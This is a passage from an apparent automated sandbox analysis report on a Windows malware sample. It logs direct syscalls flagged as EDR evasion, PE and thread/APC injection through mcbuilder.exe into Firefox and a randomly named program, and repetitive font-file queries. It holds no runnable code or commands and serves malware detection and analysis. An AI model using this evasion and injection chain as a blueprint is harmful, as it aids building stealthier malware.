                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_01906A50 mov eax, dword ptr fs:[00000030h]3_2_01906A50
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMemory written: C:\Users\user\Desktop\dGHiTqj3AB.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: NULL target: C:\Windows\SysWOW64\mcbuilder.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\mcbuilder.exeThread register set: target process: 7288Jump to behavior
                  Queues an APC in another process (thread injection)
                  Source: C:\Windows\SysWOW64\mcbuilder.exeThread APC queued: target process: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeProcess created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: fgebfePlJm.exe, 00000007.00000002.3492658941.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000000.2188243341.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp, fgebfePlJm.exe, 00000009.00000000.2469700988.0000000000F90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Users\user\Desktop\dGHiTqj3AB.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
